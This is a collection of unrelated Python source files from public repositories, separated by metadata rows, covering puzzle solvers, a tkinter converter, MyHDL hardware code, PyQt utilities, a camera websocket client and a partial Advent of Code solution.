    obj = Solution(*arg_lists[0])
    for name, args in zip(names[1:], arg_lists[1:]):
        bound = getattr(obj, name)
        outputs.append(bound(*args) if args else bound())
    return outputs
if __name__ == '__main__':
    # Ad-hoc driver: run each prepared case through test() and time it.
    cases = [
        ["cczazcc", 3],
    ]
    for case in cases:
        started = time.time()
        print('-' * 50)
        print('input:', case)
        print('output:', test(case))
        print(f'use time:{time.time() - started}s')
| monijuan/leetcode_python | code/competition/2022/20220220/6014AC. 构造限制重复的字符串.py | 6014AC. 构造限制重复的字符串.py | py | 3,709 | python | zh | code | 0 | github-code | 90 |
20297921984 | import tkinter as tk
def converter():
i=var1.get()
o=var2.get()
val=int(entry_input.get())
op_value=0
entry_output.delete(0,tk.END)
if i=='c':
if o=='f':
op_value=(val*(9/5))+32
elif o=='k':
op_value=val+273.15
else:
op_value=val
elif i=='f':
if o=='c':
op_value=(val-32)*5/9
elif o=='k':
op_value= (val-32)*(5/9 ) + 273.15
else:
op_value=val
elif i=='k':
if o=='c':
op_value=val-273.15
elif o=='f':
op_value=(val-273.15)*9/5+32
else:
op_value=val
entry_output.insert(0,op_value)
window= tk.Tk()
window.geometry('600x300')
label1=tk.Label(text="Enter the Input and choose the input scale :")
entry_input= tk.Entry()
var1=tk.StringVar(value='c')
ip_c=tk.Radiobutton(text="centigrade",variable=var1,value='c')
ip_f=tk.Radiobutton(text="fahreheit",variable=var1,value='f')
ip_k=tk.Radiobutton(text="kelvin",variable=var1,value='k')
label1.grid(row=0,column=0,columnspan=2)
entry_input.grid(row=1,column=2)
ip_c.grid(row=1,column=4)
ip_f.grid(row=1,column=5)
ip_k.grid(row=1,column=6)
#output
label2=tk.Label(text="Choose the output format :")
entry_output=tk.Entry()
var2=tk.StringVar(value='x')
op_c=tk.Radiobutton(text="centigrade",variable=var2,value='c')
op_f=tk.Radiobutton(text="fahreheit",variable=var2,value='f')
op_k=tk.Radiobutton(text="kelvin",variable=var2,value='k')
submit=tk.Button(text='ENTER',command=converter)
op_label=tk.Label(text="Output :")
brk=tk.Label(text='')
brk2=tk.Label(text='')
brk3=tk.Label(text='')
label2.grid(row=2,column=0,columnspan=1)
entry_output.grid(row=8,column=2)
brk2.grid(row=3)
op_c.grid(row=4,column=1)
op_f.grid(row=4,column=2)
op_k.grid(row=4,column=3)
brk3.grid(row=5)
brk.grid(row=7)
submit.grid(row=6,column=2)
op_label.grid(row=8,column=1)
window.mainloop()
| shiva341/python-projects | tinkter.py | tinkter.py | py | 1,981 | python | en | code | 0 | github-code | 90 |
17978127939 | import queue
import sys
sys.setrecursionlimit(10 ** 7)  # the tree walks below were written recursively
# Read an N-node tree given as N-1 edges.
N = int(input())
ab = []
for _ in range(N - 1):
    ab.append(tuple(map(int, input().split())))
# Adjacency lists, 1-indexed.
G = [[] for _ in range(N + 1)]
for el in ab:
    a, b = el
    G[a].append(b)
    G[b].append(a)
# BFS bookkeeping: visited flags, work queue, distance from node 1 and
# each node's BFS predecessor.
seen = [False] * (N + 1)
todo = queue.Queue()
dist = [0] * (N + 1)
prev = [None] * (N + 1)
def bfs(parent):
    """Breadth-first scan from `parent`, filling the module-level
    seen/dist/prev tables via the shared `todo` queue.

    Rewritten iteratively: the original recursed once per visited node,
    which can exhaust the interpreter stack on deep trees even with the
    raised recursion limit. Visitation order and side effects are the same.
    """
    while True:
        seen[parent] = True
        for child in G[parent]:
            if not seen[child]:
                todo.put(child)
                dist[child] = dist[parent] + 1
                prev[child] = parent
        if todo.empty():
            return
        parent = todo.get()
bfs(1)
#print(dist)
#print(prev)
# Distance from node 1 to node N along the tree path.
min_dist = dist[N]
#print(min_dist)
# Rebuild the path by following predecessors back from N (route runs N -> 1).
route = []
temp = N
for _ in range(min_dist + 1):
    route.append(temp)
    temp = prev[temp]
#print(route)
seen = [False] * (N + 1)  # reset for the component-size counts below
def dfs(parent):
    """Count every node reachable from `parent` into cnt[0], marking `seen`.

    Rewritten with an explicit stack: the recursive original could hit
    RecursionError on long chains. The total counted is identical.
    """
    stack = [parent]
    seen[parent] = True
    cnt[0] += 1
    while stack:
        node = stack.pop()
        for child in G[node]:
            if not seen[child]:
                seen[child] = True
                cnt[0] += 1
                stack.append(child)
# The two adjacent cells where the territories meet on the 1..N path.
# route runs N -> 1, so S is on node N's side and F on node 1's side.
S = route[(min_dist + 1) // 2 - 1]
F = route[(min_dist + 1) // 2]
# Block the frontier so each count stays on its own side of the path.
seen[S] = True
seen[F] = True
cnt = [0]
dfs(S)
arround_S = cnt[0]
cnt = [0]
dfs(F)
arround_F = cnt[0]
#print(arround_N, arround_1)
# Strict comparison: ties go to Snuke here -- presumably because the
# frontier split above already allocates the middle cell; verify against
# the task statement.
if arround_F > arround_S:
    print('Fennec')
else:
    print('Snuke')
| Aasthaengg/IBMdataset | Python_codes/p03660/s458913990.py | s458913990.py | py | 1,222 | python | en | code | 0 | github-code | 90 |
18999055483 | import myhdl
from avalon_buses import PipelineST
from common_functions import conditional_reg_assign, simple_wire_assign, simple_reg_assign
class Activation():
def __init__( self ,
DATAWIDTH = 32,
CHANNEL_WIDTH = 1,
INIT_DATA = 0):
self.DATAWIDTH = DATAWIDTH
self.CHANNEL_WIDTH = CHANNEL_WIDTH
self.INIT_DATA = INIT_DATA
# Io Signals
self.pipeST_i = PipelineST ( self.DATAWIDTH, self.CHANNEL_WIDTH, self.INIT_DATA )
self.pipeST_o = PipelineST ( self.DATAWIDTH, self.CHANNEL_WIDTH, self.INIT_DATA )
# Internal Signals
self.classifier = PipelineST ( self.DATAWIDTH, self.CHANNEL_WIDTH, self.INIT_DATA )
# Reset value to incorporate float and intbv formats
self.zero = 0.0 if ( isinstance ( self.INIT_DATA, float ) ) else 0
self.one = 1.0 if ( isinstance ( self.INIT_DATA, float ) ) else 1
# Use simple step activation function. if x <= 0, prob=0 else prob=1
@myhdl.block
def top( self ,
reset ,
clk ,
pipeST_i ,
pipeST_o ):
# Simple Step Activation Function
@myhdl.always(clk.posedge, reset.posedge)
def activation_process():
if reset: # Synchronous reset_acc
self.classifier.data.next = self.zero
elif (pipeST_i.valid == 1):
# if data > 0, prob= 1 else 0
self.classifier.data.next = self.one if ( pipeST_i.data > self.zero ) else self.zero
else:
self.classifier.data.next = self.classifier.data
# Outputs
data = simple_wire_assign ( pipeST_o.data , self.classifier.data )
sop = conditional_reg_assign ( reset , clk , pipeST_o.sop , 0, pipeST_i.valid , pipeST_i.sop )
eop = conditional_reg_assign ( reset , clk , pipeST_o.eop , 0, pipeST_i.valid , pipeST_i.eop )
valid = simple_reg_assign ( reset , clk , pipeST_o.valid , 0, pipeST_i.valid )
channel = simple_reg_assign ( reset , clk , pipeST_o.channel , 0, pipeST_i.channel )
return myhdl.instances()
| krsheshu/luttappi | lib/frameworks/activation/myhdl/activation.py | activation.py | py | 2,590 | python | en | code | 1 | github-code | 90 |
44554577427 | """
Get Maximum Gold
In a gold mine grid of size m x n, each cell in this mine has an integer representing the amount of gold in that cell, 0 if it is empty.
Return the maximum amount of gold you can collect under the conditions:
- Every time you are located in a cell you will collect all the gold in that cell.
- From your position, you can walk one step to the left, right, up, or down.
- You can't visit the same cell more than once.
- Never visit a cell with 0 gold.
- You can start and stop collecting gold from any position in the grid that has some gold.
Understand
- Find the path that will have the max sum
- Can only do one step in left, right, down, up
- Can't visit a 0 cell
Input = [[0,6,0],
[5,8,7],
[0,9,0]]
Output = 9 -> 8 -> 7 = 24
Input = [[1,0,7],
[2,0,6],
[3,4,5],
[0,3,0],
[9,0,20]]
Output = 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 = 28
Match
- DFS
Plan
- iterate through the grid, call dfs on all values that are >0
- find max path from each starting point, save max sum
Implement
Review
Input = [[0,6,0],
[5,8,7],
[0,9,0]]
Start at 6
- go to 8
- max((6,8,7), (6,8,5) , (6,8,9)) = 23
Start at 5
- go to 8
- max((5,8,7), (5,8,6) , (5,8,9)) = 22
Start at 8
- max((8,7), (8,6) , (8,9), (8,5)) = 17
Start at 7
- go to 8
- max((7,8,9), (7,8,5) , (7,8,6)) = 24
Start at 9
- go to 8
- max((9,8,7), (9,8,6) , (9,8,5)) = 24
Return 24
Evaluate
- Time Complexity: O((n*m) * 3^(n*m)), iterate through entire grid and calling dfs which we can visit up to 3 neighbors (excluding the origin point)
- Space Complexity: O(n*m), dfs stack depth can be up to the size of the grid
"""
def getMaximumGold(grid):
    """Return the largest gold sum collectible along any path that moves in
    the four cardinal directions, never revisits a cell, and never steps
    on a zero cell. Tries every cell as a starting point."""
    n_rows, n_cols = len(grid), len(grid[0])

    def explore(r, c):
        # Take the gold here, recurse into the neighbours, then restore the
        # cell so other starting points can reuse it (backtracking).
        here = grid[r][c]
        grid[r][c] = 0
        best_branch = 0
        for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            nr, nc = r + dr, c + dc
            if 0 <= nr < n_rows and 0 <= nc < n_cols and grid[nr][nc]:
                best_branch = max(best_branch, explore(nr, nc))
        grid[r][c] = here
        return here + best_branch

    return max(explore(r, c) for r in range(n_rows) for c in range(n_cols))
# Smoke tests against the two LeetCode examples (expected 24 and 28).
print("Expected Output: ", 24)
print("Actual Output: ", getMaximumGold([[0,6,0],
                                         [5,8,7],
                                         [0,9,0]]))
print("Expected Output: ", 28)
print("Actual Output: ", getMaximumGold([[1,0,7],
[2,0,6],
[3,4,5],
[0,3,0],
[9,0,20]])) | kpham841/LeetCode_Python | Matrix/Get_Max_Gold.py | Get_Max_Gold.py | py | 2,671 | python | en | code | 0 | github-code | 90 |
18544286859 | import sys
N, C = map(int, sys.stdin.readline().split())  # N plates on a counter of circumference C
sushi_set = []
for i in range(N):
    x, v = map(int, sys.stdin.readline().split())
    sushi_set.append((x, v))  # (position, calories)
sushi_set.sort()
ans = -1
# "It should be enough to consider at most one change of direction?"
# (translated from the original Japanese note)
# right
# Clockwise pass: right[i] is the best net gain (calories minus distance)
# stopping at any of the first i+1 plates; right_back[i] pays the distance
# twice, i.e. walking out and returning to the start.
right = [0 for _ in range(N)]
max_n = -float("inf")
energy = 0
right_back = [0 for _ in range(N)]
for i, (x, v) in enumerate(sushi_set):
    energy += v
    if energy - x > max_n:
        max_n = energy - x
    right[i] = max_n
    right_back[i] = energy - 2 * x
# left
# Same quantities counter-clockwise; the distance to plate x is C - x.
left = [0 for _ in range(N)]
max_n = -float("inf")
energy = 0
left_back = [0 for _ in range(N)]
for i, (x, v) in enumerate(sushi_set[::-1]):
    energy += v
    if energy - (C - x) > max_n:
        max_n = energy - (C - x)
    left[i] = max_n
    left_back[i] = energy - 2 * (C - x)
# print("right", right)
# print("right_back", right_back)
# print("left", left)
# print("left_back", left_back)
# Best one-way trip in either direction.
ans = max(max(right), max(left))
# print(ans)
# right -> left
# Combined trips: go one way, come back past the start, continue the other way.
for i in range(N-1):
    ans = max(ans, right_back[i] + left[N-2-i])
# left -> right
for i in range(N-1):
    ans = max(ans, left_back[i] + right[N-2-i])
print(max(ans, 0)) | Aasthaengg/IBMdataset | Python_codes/p03372/s840505934.py | s840505934.py | py | 1,183 | python | en | code | 0 | github-code | 90 |
25212861337 | # -*- coding: utf-8 -*-
'''
Модули с описанием смежных классов
'''
from PyQt5.QtWidgets import QWidget, QDialog, QLabel, QPushButton, QVBoxLayout, QProgressBar
from PyQt5.QtGui import QFont
from PyQt5.QtCore import Qt, QObject, pyqtSignal, pyqtSlot
from work_lib import work_time, web_time, shutdown_lib
from work_setting import module, dialog
import datetime, time
#from win32com.test.testIterators import SomeObject
#организуем многопоточнсть (считываем с сайта или ловим выключение компьютера в отдельном потоке)
class ShowShutOrWeb(QObject):
    """Worker object (intended for a second thread, per the module comments):
    either polls the web service or records the machine's power-on time, and
    drives the shutdown countdown."""
    # Declare all signals.
    finished = pyqtSignal()
    finished_global = pyqtSignal()
    intReady = pyqtSignal(int)
    start_shut = pyqtSignal(int)
    show_wnd = pyqtSignal()
    def ShutOrWeb(self):
        # If the "work with the web site" option is enabled, read the site.
        if(int(module.read_setting(16))):
            # Run the site-reading routine.
            self.RunWeb()
        # Otherwise operate by catching the computer's power on/off events.
        else:
            # Current date and time of this machine.
            tekdateandtimeStart = datetime.datetime.now()
            tekyear = tekdateandtimeStart.year # current year
            tekmonth = tekdateandtimeStart.month # current month
            tekday = tekdateandtimeStart.day # current day
            tekhour = tekdateandtimeStart.hour # current hour
            tekminute = tekdateandtimeStart.minute # current minute
            # Apply the configured offset.
            min_offset = int(module.read_setting(10)) # read the offset
            # Subtract the offset from the minutes, borrowing an hour if needed.
            if tekminute - min_offset >= 0:
                tekminute = tekminute - min_offset
            else:
                tekhour = tekhour - 1
                tekminute = 60 + (tekminute - min_offset)
            # Record the computer's power-on time.
            work_time.start_work(tekminute, tekhour, tekday, tekmonth, tekyear)
            #self.finished_global.emit()
    # If web_main() returns the shutdown flag, start the countdown window.
    @pyqtSlot()
    def RunWeb(self):
        flg_shut = web_time.web_main()
        module.log_info("flg_shut: %s" % flg_shut)
        if flg_shut == True:
            module.write_setting(0, 28) # mark a normal (planned) termination
            self.start_shut.emit(flg_shut) # ask the UI to start the shutdown timer
            self.finished_global.emit()
            shutdown_lib.signal_shutdown()
    # Main countdown loop: emits 60 down to 0, one step per second.
    @pyqtSlot()
    def CountTime(self):
        self.show_wnd.emit()
        maxtime = 60
        for count in range(maxtime+1):
            step = maxtime - count
            self.intReady.emit(step)
            time.sleep(1)
        self.finished.emit()
#класс для таймера выключения
class ShutWindow(QWidget):
    """Frameless, always-on-top window showing the 60-second shutdown countdown."""
    def __init__(self):
        super(ShutWindow, self).__init__()
        # build the form
        self.initUI()
    def initUI(self):
        """Create the labels, the stop button and the layout."""
        self.resize(200,200) # set fixed window dimensions
        self.setWindowFlags(Qt.FramelessWindowHint|Qt.WindowStaysOnTopHint) # window without a frame
        self.setAttribute(Qt.WA_TranslucentBackground) #transparent window
        self.lbl = QLabel(self) #caption label
        self.lbl.setFont(QFont('Arial', 12)) #font
        self.lbl.setText('До выключения остальсь:')
        self.lbl.adjustSize() #adaptive size depending on the content
        self.lbl_timer = QLabel(self) #label holding the counter
        self.lbl_timer.setFont(QFont('Arial', 150)) #font
        self.lbl_timer.setText('60')
        self.lbl_timer.setStyleSheet('color: red') #red text colour
        self.btn_stop = QPushButton('Остановить\nвыключение', self) #button that stops the counter
        self.btn_stop.setFont(QFont('Arial', 12)) #font
        self.btn_stop.clicked.connect(self.close_programm) #action on click
        # arrange the widgets in the window
        self.v_box = QVBoxLayout()
        self.v_box.addWidget(self.lbl)
        self.v_box.addWidget(self.lbl_timer)
        self.v_box.addWidget(self.btn_stop)
        self.setLayout(self.v_box)
    # write the counter value into the label (zero padded to two digits)
    def onShutReady(self, count):
        self.lbl_timer.setText(str(count).rjust(2, '0'))
    # show the window when signalled
    def on_show_wnd(self):
        self.show()
    # on button press shut the program down
    def close_programm(self):
        ex = dialog.MainWindow()
        ex.cleanUp()
##############################################################################################################
#objects for the thread that computes the recount progress
class ThreadProgressRecount(QObject):
    """Worker object that recounts the Excel workbook year by year and
    reports progress through Qt signals."""
    finished = pyqtSignal()
    show_act = pyqtSignal()
    count_changed = pyqtSignal(int) #signal used to publish the rewrite progress
    not_recount = pyqtSignal()      # a year failed to recount
    donot_open = pyqtSignal()       # the workbook could not be opened
    finished_progress = pyqtSignal()
    # function that counts the progress of the Excel file recount
    def ThreadRecount(self):
        self.CountRecount()
    @pyqtSlot()
    def CountRecount(self):
        """Recount every year found in the workbook, emitting progress after each."""
        # get the array of years
        try:
            exel_year = work_time.exel_year() #also verifies the file exists
        except:
            self.donot_open.emit()
            self.finished.emit()
            self.finished_progress.emit()
            return
        step = 100/len(exel_year)
        count = 0
        self.show_act.emit()
        self.count_changed.emit(count)
        # in a loop compute the number of working hours in each month of the year
        for i in range(len(exel_year)):
            try:
                result = work_time.year_recount(int(exel_year[i]))
                # if the recount failed
                if result == False:
                    self.not_recount.emit()
                    break
            except:
                self.not_recount.emit()
                break
            count = count + step
            self.count_changed.emit(count)
        self.finished.emit()
        self.finished_progress.emit()
#окно с прогрессом пересчета
class ProgressRecount(QDialog):
    """Frameless modal dialog holding the recount progress bar."""
    def __init__(self):
        super().__init__()
        self.initUI()
    def initUI(self):
        # window without a frame
        self.resize(400, 50)
        self.setWindowFlags(Qt.FramelessWindowHint) # window without a frame
        self.setAttribute(Qt.WA_TranslucentBackground) #transparent window
        # create the progress bar
        self.pbar = QProgressBar(self)
        self.pbar.setFont(QFont('Arial', 14))
        self.pbar.setValue(0)
        # put it into the window
        self.vbox = QVBoxLayout()
        self.vbox.addWidget(self.pbar)
        self.setLayout(self.vbox)
    # slot receiving the computed progress value
    def doAction(self, value):
        self.pbar.setValue(value)
        if value >= 100:
            time.sleep(1) #so that 100% stays visible for a moment
    # show the window, blocking the others (modal)
    def on_show_act(self):
        self.exec()
| SelYui/working-hours | work_setting/adjacent_classes.py | adjacent_classes.py | py | 8,730 | python | ru | code | 0 | github-code | 90 |
25589025634 | import os
from absl.testing import absltest
from framework import xds_url_map_testcase # Needed for xDS flags
_TEST_CASE_FOLDER = os.path.dirname(__file__)
def load_tests(loader: absltest.TestLoader, unused_tests, unused_pattern):
    """unittest ``load_tests`` protocol hook: discover every url-map test-case
    module in this folder, matching the project's test-file suffix instead of
    the default discovery pattern."""
    return loader.discover(
        _TEST_CASE_FOLDER,
        pattern="*" + xds_url_map_testcase.URL_MAP_TESTCASE_FILE_SUFFIX,
    )
if __name__ == "__main__":
    absltest.main()
| grpc/grpc | tools/run_tests/xds_k8s_test_driver/tests/url_map/__main__.py | __main__.py | py | 420 | python | en | code | 39,468 | github-code | 90 |
19502849374 | import csv
disease_lsit = ['AF', 'BBB', 'TAC', 'normal']
file_path = 'D:/data/ECG/result/20210330/'
file_path_AF = file_path + 'AF.csv'
file_path_BBB = file_path + 'BBB.csv'
file_path_TAC = file_path + 'TAC.csv'
file_path_normal = file_path + 'normal.csv'
def read_file(file_path):
    """Read a result CSV and return its rows as [record_id, p0, p1, p2, p3].

    The first line is assumed to be a header and is skipped.  Column 0 is
    kept as a string; columns 1-4 are converted to float.
    """
    # newline='' is the csv-module documented way to open CSV files
    with open(file_path, newline='') as f:
        csv_reader = csv.reader(f)
        next(csv_reader, None)  # skip the header; tolerate an empty file
        return [[row[0], float(row[1]), float(row[2]), float(row[3]), float(row[4])]
                for row in csv_reader]
def add_data(data, some_result, groud_truth):
    """Merge *some_result* rows into *data*, tagging each record with the
    *groud_truth* label; probabilities of repeated records must match."""
    assert groud_truth in disease_lsit
    for record in some_result:
        key = record[0]
        probs = [record[1], record[2], record[3], record[4]]
        if key in data:
            # the same record must always carry the same probabilities
            assert data[key]['prob'] == probs
            data[key]['ground_truth'].append(groud_truth)
        else:
            data[key] = {'prob': probs, 'ground_truth': [groud_truth]}
    return data
def guess(data):
    """Attach a 'guess' label list to every record: each disease whose
    probability exceeds 0.1 is predicted; with none, predict 'normal'."""
    for record in data.values():
        labels = []
        for idx, name in ((0, 'AF'), (1, 'BBB'), (2, 'TAC')):
            if record['prob'][idx] > 0.1:
                labels.append(name)
        if not labels:
            labels.append('normal')
        record['guess'] = labels
    return data
# load the per-class prediction files and merge them into one record table
AF_result = read_file(file_path_AF)
BBB_result = read_file(file_path_BBB)
TAC_result = read_file(file_path_TAC)
normal_result = read_file(file_path_normal)
data = {}
data = add_data(data, AF_result, 'AF')
data = add_data(data, BBB_result, 'BBB')
data = add_data(data, TAC_result, 'TAC')
data = add_data(data, normal_result, 'normal')
data = guess(data)
# per-class true-positive counters and overall error counters
tp_AF = 0
tp_BBB = 0
tp_TAC = 0
error = 0
# error_AF = 0
# error_BBB = 0
# error_TAC = 0
error_normal = 0
for key, value in data.items():
    if 'AF' in value['ground_truth'] and 'AF' in value['guess']:
        tp_AF += 1
    if 'BBB' in value['ground_truth'] and 'BBB' in value['guess']:
        tp_BBB += 1
    if 'TAC' in value['ground_truth'] and 'TAC' in value['guess']:
        tp_TAC += 1
    if 'normal' in value['ground_truth'] and 'normal' not in value['guess']:
        error_normal += 1
    # a record counts as an error when guess and ground truth share no label
    if len(list(set(value['ground_truth']).intersection(set(value['guess'])))) == 0:
        error += 1
# per-class recall; 3000 is presumably the sample count per class - TODO confirm
print(tp_AF/3000)
print(tp_BBB/3000)
print(tp_TAC/3000)
print((3000 - error_normal)/3000)
print(error/len(data))
| hezhongyu/EEG | exps/temp.py | temp.py | py | 2,495 | python | en | code | 0 | github-code | 90 |
73888829418 | from decimal import Decimal
# rank people by descending a/(a+b) ratio; Decimal keeps the comparison exact
n = int(input())
ab = [list(map(int, input().split())) for _ in range(n)]
data = []
for i in range(n):
    a, b = ab[i]
    # negate so the ascending (stable) sort yields the highest ratio first,
    # with ties broken by the original index
    data.append((-Decimal(a) / Decimal(a + b), i))
data.sort()
# print the 1-based indices in ranked order
print(*[x[1] + 1 for x in data])
| ia7ck/competitive-programming | AtCoder/abc308/c/main.py | main.py | py | 247 | python | en | code | 0 | github-code | 90 |
class Solution:
    # @param {string} path
    # @return {string}
    def simplifyPath(self, path):
        """Return the canonical simplified form of the absolute Unix *path*.

        '.' is ignored, '..' pops one directory, and empty segments collapse.
        Bug fix: the original used ``for i in range(len(path))`` with a dead
        ``i = end`` assignment, so every suffix of a multi-character segment
        was pushed too (e.g. "/ab" became "/ab/b").  A while-loop jumps from
        one '/' to the next instead.
        """
        stack = []
        i = 0
        n = len(path)
        while i < n:
            # find the end of the segment that starts just after position i
            end = i + 1
            while end < n and path[end] != '/':
                end += 1
            sub = path[i+1:end]
            if sub:
                if sub == '..':
                    if stack:
                        stack.pop()
                elif sub != '.':
                    stack.append(sub)
            i = end  # jump to the next '/' (or past the end)
        if not stack:
            return '/'
        return ''.join('/' + part for part in stack)
"""
# ******* The Second Time *********
# 解题思路:题目的要求是输出Unix下的最简路径,Unix文件的根目录为"/","."表示当前目录,".."表示上级目录。
# 使用一个栈来解决问题。遇到'..'弹栈,遇到'.'不操作,其他情况下压栈。
"""
class Solution(object):
    def simplifyPath(self, path):
        """Collapse '.', '..' and empty segments of the absolute Unix *path*.

        :type path: str
        :rtype: str
        """
        parts = ['/']
        for segment in path.split('/'):
            if segment in ('', '.'):
                continue
            if segment == '..':
                # never pop the root marker itself
                if len(parts) > 1:
                    parts.pop()
            else:
                parts.append(segment + '/')
        joined = ''.join(parts)
        # strip the trailing '/' unless the result is just the root
        return joined.rstrip('/') if len(parts) > 1 else joined
| xiangzuo2022/leetcode_python | python/71.simplify_path.py | 71.simplify_path.py | py | 1,374 | python | en | code | 0 | github-code | 90 |
17374932941 | import requests
from django.shortcuts import render, redirect
from django.views.generic.base import View
from .forms import NewOrdertForm
from .models import Category, Product, ShopInfo, TelegramBot
from main.models import Contact
def catalog(request):
    """Catalogue page: all products and categories plus the latest shop info."""
    products = Product.objects.all()
    categories = Category.objects.all()
    info = ShopInfo.objects.last()
    return render(request, 'catalog.html', {
        'products': products,
        'info': info,
        'categories': categories,
    })
class ProductDetailView(View):
    """Product detail page."""
    def get(self, request, pk):
        product = Product.objects.get(id=pk)
        contact = Contact.objects.last()
        # trimmed description passed to the template
        # NOTE(review): the [3:160] slice presumably skips a leading markup tag - confirm
        description = product.description[3:160]
        return render(request, 'product_detail.html', {
            'product': product,
            'contact': contact,
            'description': description,
        })
class CreateOrder(View):
    """Product order page: GET shows the order form, POST saves the order and
    forwards it to the shop's Telegram chat."""
    def get(self, request, pk):
        product = Product.objects.get(id=pk)
        return render(request, 'order.html', {
            'product': product
        })
    def post(self, request, pk):
        form = NewOrdertForm(request.POST)
        bot = TelegramBot.objects.last()
        if form.is_valid():
            form.save()
            success = True
            # Telegram Bot API sendMessage endpoint
            url = f'{bot.url}' + '/sendMessage'
            chat_id = bot.chat_id
            product = request.POST.get('product')
            name = request.POST.get('name')
            phone = request.POST.get('phone')
            comment = request.POST.get('comment')
            price = request.POST.get('price')
            text = f'Новая заявка: \n Товар: {product} \n Цена: {price} \n Имя: {name} \n Телефон: {phone} \n Дополнительно: {comment}'
            answer = {'chat_id': chat_id, 'text': text}
            requests.post(url, answer)
            return render(request, 'thanks.html', {
                'success': success,
            })
        return redirect('product_detail') | Eldar1988/mir_divanov | HelloDjango/shop/views.py | views.py | py | 2,142 | python | en | code | 0 | github-code | 90 |
18066593969 | import math
import collections
import fractions
import itertools
import functools
import operator
def solve():
    """Read one line of keystrokes from stdin and print the editor result:
    '0' and '1' append that character, any other character acts as a
    backspace (removes the last character if one exists)."""
    s = input()
    edge = collections.deque()
    for i in s:
        if i == "0":
            edge.append("0")
        elif i == "1":
            edge.append("1")
        elif len(edge) > 0:
            # backspace: drop the most recently typed character
            edge.pop()
    print("".join(edge))
    return 0
if __name__ == "__main__":
    solve()
| Aasthaengg/IBMdataset | Python_codes/p04030/s077220293.py | s077220293.py | py | 406 | python | en | code | 0 | github-code | 90 |
39804163775 | # -*- coding:utf-8 -*-
from websocket import create_connection
import sys
import io
import picamera
import numpy as np
import base64
import cv2
# camera configuration and shared JPEG buffer
CAMERA_WIDTH = 320
CAMERA_HEIGHT = 240
stream = io.BytesIO()
camera = picamera.PiCamera()
camera.resolution = (CAMERA_WIDTH,CAMERA_HEIGHT)
def Capture():
    """Capture one JPEG frame from the Pi camera and return its bytes."""
    camera.capture(stream, format = 'jpeg')
    data = stream.getvalue()
    stream.seek(0)
    # NOTE(review): the stream is rewound but never truncated, so a frame
    # shorter than the previous one leaves stale trailing bytes - confirm
    return data
if __name__ == '__main__':
    # stream frames to the recognition server until it reports a match
    ws = create_connection("ws://192.168.10.54:8000/websocket")
    print("Connection is started")
    #data = "hello"
    while True:
        # .encode('base64') is a Python 2 idiom; this script targets Python 2
        ws.send(Capture().encode('base64'))
        ans = ws.recv()
        print(ans)
        if ans == "found!":
            break
    ws.close()
| YonDeraPP/sotsuken | ws_client.py | ws_client.py | py | 723 | python | en | code | 0 | github-code | 90 |
22126271946 | # You will be given a number and you will need to return it as a string in Expanded Form. For example:
# expanded_form(12) # Should return '10 + 2'
# expanded_form(42) # Should return '40 + 2'
# expanded_form(70304) # Should return '70000 + 300 + 4'
# NOTE: All numbers will be whole numbers greater than 0.
def expanded_form(num):
    """Return *num* written in expanded form, e.g. 70304 -> '70000 + 300 + 4'.

    ``num`` must be a whole number greater than 0.
    Cleanup: the original kept a dead ``count`` counter, built the string
    with quadratic ``+=`` and sliced off a trailing ' + '; a join avoids all three.
    """
    digits = str(num)
    # each non-zero digit keeps the zeros of its place value
    terms = [
        digit + '0' * (len(digits) - pos - 1)
        for pos, digit in enumerate(digits)
        if digit != '0'
    ]
    return ' + '.join(terms)
9512423407 | import numpy as np
INPUT = """467..114..
...*......
..35..633.
......#...
617*......
.....+.58.
..592.....
......755.
...$.*....
.664.598.."""
def parse_grid(input):
    """Split *input* on newlines and return a 2-D numpy array of single characters."""
    rows = []
    for line in input.split('\n'):
        rows.append(list(line))
    return np.asarray(rows)
def find_gear_candidates(grid):
    """Return (row, col) positions of every '*' cell, scanned row-major."""
    rows, cols = grid.shape
    return [
        (r, c)
        for r in range(rows)
        for c in range(cols)
        if grid[r, c] == '*'
    ]
def find_number_starts(grid):
    """Return (row, col) of the first digit of every horizontal digit run."""
    starts = []
    rows, cols = grid.shape
    for r in range(rows):
        in_run = False
        for c in range(cols):
            is_digit = grid[r, c].isnumeric()
            if is_digit and not in_run:
                starts.append((r, c))
            in_run = is_digit
    return starts
def find_number_starting_at(grid, number_start):
    """Collect the digits (as ints) of the run beginning at *number_start*."""
    row, col = number_start
    digits = []
    for cell in grid[row, col:]:
        if not cell.isnumeric():
            break
        digits.append(int(cell))
    return digits
def has_surrounding_symbol(grid, number_start):
    """Return True if any cell adjacent (incl. diagonals) to the number
    starting at *number_start* holds a symbol (non-digit and not '.')."""
    number_len = len(find_number_starting_at(grid, number_start))
    start_row = max(number_start[0] - 1, 0)
    end_row = min(number_start[0] + 2, grid.shape[0])
    start_col = max(number_start[1] - 1, 0)
    # the number spans columns [col, col+number_len); its right neighbour is
    # col+number_len, so the exclusive slice bound is col+number_len+1.
    # Bug fix: the original used +2, which also inspected one NON-adjacent
    # column (the sibling is_adjacent_to_gear correctly uses +1).
    end_col = min(number_start[1] + number_len + 1, grid.shape[1])
    sub_grid = grid[start_row:end_row, start_col:end_col]
    for i in range(sub_grid.shape[0]):
        for j in range(sub_grid.shape[1]):
            c = sub_grid[i, j]
            if not c.isnumeric() and c != '.':
                return True
    return False
def has_two_surrounding_numbers(grid, pos):
    """Return True if exactly two horizontal digit runs touch the cell at *pos*.

    *pos* is expected to be a non-digit ('*') cell, so number_len below is 0
    and the +2 bound makes the window exactly the 3x3 neighbourhood of *pos*.
    """
    number_len = len(find_number_starting_at(grid, pos))
    start_row = max(pos[0]-1, 0)
    end_row = min(pos[0]+2, grid.shape[0]+1)
    start_col = max(pos[1]-1, 0)
    end_col = min(pos[1]+number_len+2, grid.shape[1]+1)
    sub_grid = grid[start_row:end_row, start_col:end_col]
    # print(sub_grid)
    # count distinct digit runs row by row within the window
    surrounding_numbers = 0
    for i in range(sub_grid.shape[0]):
        prev_is_number = False
        for j in range(sub_grid.shape[1]):
            c = sub_grid[i, j]
            if c.isnumeric():
                if not prev_is_number:
                    surrounding_numbers += 1
                prev_is_number = True
            else:
                prev_is_number = False
    # print(surrounding_numbers)
    return 2 == surrounding_numbers
def get_numbers_with_surrounding_symbols(grid):
    """Return every number in *grid* that touches a symbol (AoC 'part numbers')."""
    numbers = []
    number_starts = find_number_starts(grid)
    # [print(has_surrounding_symbol(grid, number_start), '\n') for number_start in number_starts]
    for number_start in number_starts:
        if has_surrounding_symbol(grid, number_start):
            number_list = find_number_starting_at(grid, number_start)
            # reassemble the digit list into an integer
            number = 0
